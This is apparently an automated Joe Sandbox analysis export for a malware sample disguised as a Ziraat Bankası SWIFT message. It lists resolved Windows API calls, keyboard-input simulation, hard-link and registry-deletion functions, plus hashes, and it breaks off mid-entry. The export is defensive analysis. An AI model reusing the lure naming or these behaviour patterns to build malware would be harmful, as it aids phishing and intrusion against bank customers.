Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: c7efe0455848ce243691e1fa84b7afae0c8c225aa737448d21c8b57423185011
Instruction ID: cec2e93227438cbb9e11e3c5dfd63131a878ab741621d667a745bd0a1772a880
Opcode Fuzzy Hash: c7efe0455848ce243691e1fa84b7afae0c8c225aa737448d21c8b57423185011
Instruction Fuzzy Hash: 69E01271805618EBCB2CD750DD05EFD777CAF04741F9100A2F906A1004E7359BD8AA92

Function 00102205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,001021FB,?,001023EF), ref: 00102213
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00102225

Strings

kernel32.dll, xrefs: 0010220E
GetProcessId, xrefs: 0010221F

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: 15886b660e464e994d329d75a2132ca7eca858807f71b6c2f6cef1466d390e4a
Instruction ID: f864f0e1f9976f6c47789e30f266f825fe3537beabbf4db3b910fcba524bbb03
Opcode Fuzzy Hash: 15886b660e464e994d329d75a2132ca7eca858807f71b6c2f6cef1466d390e4a
Instruction Fuzzy Hash: 6FD0A734400712FFD7314F70F80D64176D4EB06305B114419ECD1E2990E7B0D8D88650

Function 000A42F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,000A42EC,?,000A42AA,?), ref: 000A4304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000A4316

Strings

kernel32.dll, xrefs: 000A42FF
Wow64RevertWow64FsRedirection, xrefs: 000A4310

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 7b898e57d55a310fc298b2e0aeb73fe0d4120f359796c20048f3b20c69fc4c4d
Instruction ID: 05d6c574f5ddc6e6ec69f755edcbf0aeb263f14f5c51d4dda1f5e810a9f511e7
Opcode Fuzzy Hash: 7b898e57d55a310fc298b2e0aeb73fe0d4120f359796c20048f3b20c69fc4c4d
Instruction Fuzzy Hash: A0D0A775400712EFDF304F64F80D64576D4EB06302B104419E861D2960D7F0C8D48610

Function 000A434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,000A41BB,000A4341,?,000A422F,?,000A41BB,?,?,?,?,000A39FE,?,00000001), ref: 000A4359
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000A436B

Strings

Wow64DisableWow64FsRedirection, xrefs: 000A4365
kernel32.dll, xrefs: 000A4354

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 1c1364597040489b1079cdc7149ab9894fb602542ff563ba4f9d285d25d4dc6e
Instruction ID: 42bfddb213fbc64c6fea31c046233873ce5be445969f7c81e50b8f0efe570c2f
Opcode Fuzzy Hash: 1c1364597040489b1079cdc7149ab9894fb602542ff563ba4f9d285d25d4dc6e
Instruction Fuzzy Hash: EED0A7B5400712FFDB308F70F80964176D4AB12716B204419E8A1D2950D7F0D8D48610

Function 000E0539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,000E051D,?,000E05FE), ref: 000E0547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 000E0559

Strings

oleaut32.dll, xrefs: 000E0542
RegisterTypeLibForUser, xrefs: 000E0553

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: 595e9429d87a919114b636c069007f7409c8c0a424dbf0f9678cf5e657a3aa5f
Instruction ID: ce8d3a01e666e510878e9745ee2cc0c2067ebde518435aa6be0b8281e9628d0f
Opcode Fuzzy Hash: 595e9429d87a919114b636c069007f7409c8c0a424dbf0f9678cf5e657a3aa5f
Instruction Fuzzy Hash: 63D0A732500B12EFD7308F21F80864277E4AB11302B50C85EE856E2950D7B0CCD48A10

Function 000E0564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,000E052F,?,000E06D7), ref: 000E0572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 000E0584

Strings

oleaut32.dll, xrefs: 000E056D
UnRegisterTypeLibForUser, xrefs: 000E057E

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: 8e731a8408bc51477e40d2c385511e5797b5c341e93292dcebd6fc0bc9c37ff5
Instruction ID: bc942dfa9909215a393af8273cd8cbef21f195c213b011f54d62e72a9a83eec1
Opcode Fuzzy Hash: 8e731a8408bc51477e40d2c385511e5797b5c341e93292dcebd6fc0bc9c37ff5
Instruction Fuzzy Hash: 4AD0A732400712EFD7305F31F808B4377E4AB06301B10C42EEC91E2950D7B0C8D48A30

Function 000FECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,000FECBE,?,000FEBBB), ref: 000FECD6
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 000FECE8

Strings

kernel32.dll, xrefs: 000FECD1
GetSystemWow64DirectoryW, xrefs: 000FECE2

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 8840cddf2d76fb522e5c17778598cda8a4f084fb0fe8d6ab6440b44981b8b2ee
Instruction ID: 23a3de38357cb15be5b56dec78073ace06a0c311782662ea5e29bc1962da74ab
Opcode Fuzzy Hash: 8840cddf2d76fb522e5c17778598cda8a4f084fb0fe8d6ab6440b44981b8b2ee
Instruction Fuzzy Hash: D8D0A730400763EFDB305F60F84965276E4AB01701B10841AFC55D2D60DB70C8D59660

Function 000FBADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,000FBAD3,00000001,000FB6EE,?,0013DC00), ref: 000FBAEB
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 000FBAFD

Strings

kernel32.dll, xrefs: 000FBAE6
GetModuleHandleExW, xrefs: 000FBAF7

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: c22e82aa24254fa4f27ddfff4e4bcb28b3e4f53b2d0e4fec580ba2712160514b
Instruction ID: 6055fd4ff9e9674b096440114ebb9b95c8a492741b6343b90f32e80fac6844a4
Opcode Fuzzy Hash: c22e82aa24254fa4f27ddfff4e4bcb28b3e4f53b2d0e4fec580ba2712160514b
Instruction Fuzzy Hash: DAD0A730800712EFD7306F20FC49B6376D4AB01341B104419ED53D2D50D7B0C8D4CA10

Function 00103BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00103BD1,?,00103E06), ref: 00103BE9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00103BFB

Strings

advapi32.dll, xrefs: 00103BE4
RegDeleteKeyExW, xrefs: 00103BF5

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: ab8dd0934cf2620f5c1287b71dcde5f76d3e309a96f27f64438142e0877b9f7d
Instruction ID: 9e91e0b3186737c263015c6e568c5e0c1552212da3107b8fd5b7ec465bb59536
Opcode Fuzzy Hash: ab8dd0934cf2620f5c1287b71dcde5f76d3e309a96f27f64438142e0877b9f7d
Instruction Fuzzy Hash: C0D0A770400712EFE7305F62F908743FAF8AB02319B10441AF8A5E2990D7F0C4D48E10

Function 000D9B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3e2ee757600c4afefde86550de857e7971dc797a56a10a5a4c17b44b83a3459
Instruction ID: 12cb3f77d0abb4926d1c3e6ddf813bbaf1d6f66a6cf06fc9bd0c01e9d670ea5b
Opcode Fuzzy Hash: d3e2ee757600c4afefde86550de857e7971dc797a56a10a5a4c17b44b83a3459
Instruction Fuzzy Hash: 60C14A75A1031AEFCB14DFA4C894AAEB7B5FF48704F10859AE905AB351D730EE41DBA0

Function 000FAA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 000FAAB4
CoUninitialize.OLE32 ref: 000FAABF

Part of subcall function 000E0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 000E027B

VariantInit.OLEAUT32(?), ref: 000FAACA
VariantClear.OLEAUT32(?), ref: 000FAD9D

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: a681522a9618d7e6425fd057b767bfef38dfa955f9d1cce08f409e4c28bf2f44
Instruction ID: a51edb562b8b65d7b6b3939b767ba7c0d8f985c8076e1838dcfbfdf349850478
Opcode Fuzzy Hash: a681522a9618d7e6425fd057b767bfef38dfa955f9d1cce08f409e4c28bf2f44
Instruction Fuzzy Hash: BEA13775304705AFCB10DF54C481BAAB7E4BF8A710F148449FA9A9B7A2CB30ED44DB86

Function 000D91CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 000D91DD
SysAllocString.OLEAUT32(?), ref: 000D9286
VariantCopy.OLEAUT32 ref: 000D92B5
VariantClear.OLEAUT32(?), ref: 000D92DC

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: b19c676281cc47cecb5c55963f6ad3602bb51f4f618c2c68dddf0214384ea010
Instruction ID: c7ec56250232a516d343666c2e5105f0bc8215c79fc17b3cd860965d05bb108b
Opcode Fuzzy Hash: b19c676281cc47cecb5c55963f6ad3602bb51f4f618c2c68dddf0214384ea010
Instruction Fuzzy Hash: 1F519530A04306EBDB74AF69D895AAEB3E5EF45310F20881FE546DB7D2DB70D9808725

Function 000C365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 000C36B7
_memcpy_s.LIBCMT ref: 000C3729
__filbuf.LIBCMT ref: 000C37AA
_memset.LIBCMT ref: 000C37EE

Part of subcall function 000C7C0E: __getptd_noexit.LIBCMT ref: 000C7C0E

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction ID: e8b89de3531765bc081e3fefa1609e2363b1f9be36e067ffd72130021f11e490
Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction Fuzzy Hash: 0351AFB0A14305ABDB388FA98885FAE77E5AF40320F24C72DF826962D1D7719F549B40

Function 000EC396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 000A4517: _fseek.LIBCMT ref: 000A452F

Part of subcall function 000EC56D: _wcscmp.LIBCMT ref: 000EC65D
Part of subcall function 000EC56D: _wcscmp.LIBCMT ref: 000EC670

_free.LIBCMT ref: 000EC4DD
_free.LIBCMT ref: 000EC4E4
_free.LIBCMT ref: 000EC54F

Part of subcall function 000C1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,000C7A85), ref: 000C1CB1
Part of subcall function 000C1C9D: GetLastError.KERNEL32(00000000,?,000C7A85), ref: 000C1CC3

_free.LIBCMT ref: 000EC557

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 175c17775220f26e0e0cd87b3ee38f03475ae72a0804ab278d6a86c3e5061848
Instruction ID: 2bb4d9b740fb81453b2958b97d6add3b2e623af899772a2804ba07ce92a86de4
Opcode Fuzzy Hash: 175c17775220f26e0e0cd87b3ee38f03475ae72a0804ab278d6a86c3e5061848
Instruction Fuzzy Hash: 0D515FB5904258AFDB249F65DC81BEDBBB9FF49300F1040AEF259B3242DB715A808F58

Function 000E390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 000E3966
SetKeyboardState.USER32(00000080,?,00000001), ref: 000E3982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 000E39EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 000E3A4D

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: f4d3af7c3251dda4fa8afb5690899d8df8b0763369a884a2aa585483d6b4ee79
Instruction ID: ace2aa4819f9b8c7dde1b153f92b0f8f277d7bf48622318c1c717c75446a8dfe
Opcode Fuzzy Hash: f4d3af7c3251dda4fa8afb5690899d8df8b0763369a884a2aa585483d6b4ee79
Instruction Fuzzy Hash: FA410470A04298AEEF708B66D80DBFDBFF99B45310F08015AE5C1B32C2C7B58A85D765

Function 000EE698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 000EE742
GetLastError.KERNEL32(?,00000000), ref: 000EE768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 000EE78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 000EE7B9

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: b77ca133b24f4be0d08e93d56b93a3e0c89520d4317b6e136d09d3b15ac0e3e3
Instruction ID: f4b6b095cb747a239e7d0f7694b177a31b1b035231ace0c0f2a69b4ec39a0dca
Opcode Fuzzy Hash: b77ca133b24f4be0d08e93d56b93a3e0c89520d4317b6e136d09d3b15ac0e3e3
Instruction Fuzzy Hash: 3541383A200650EFCF11EF55C444A8DBBF5BF5A710B198089EA46AB3A2CB30FD41CB91

Function 0010D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0010D807
GetWindowRect.USER32(?,?), ref: 0010D87D
PtInRect.USER32(?,?,0010ED5A), ref: 0010D88D
MessageBeep.USER32(00000000), ref: 0010D8FE

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 704b5a02e479dbf8009cd8c13a1e02e5269ed000ba6f51f103407b4956ceeb8f
Instruction ID: a370361a5912df4a868ea98e522613abe6adfd96909d4999b3e5884e761aa8f9
Opcode Fuzzy Hash: 704b5a02e479dbf8009cd8c13a1e02e5269ed000ba6f51f103407b4956ceeb8f
Instruction Fuzzy Hash: E941B274A00219EFCB11DF98E884BA97BF5FF44310F19C1AAE9958B2A0D3B0E941CF50

Function 000E3A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 000E3AB8
SetKeyboardState.USER32(00000080,?,00008000), ref: 000E3AD4
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 000E3B34
SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 000E3B92

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 3b9eeabf976f350cc8548771bc339a46c2fd51b092089c749c09211170ec7e21
Instruction ID: 2d8690cbb3cef5a1492f0c997a2692a58a44e380ea20849becebf8408b0a2802
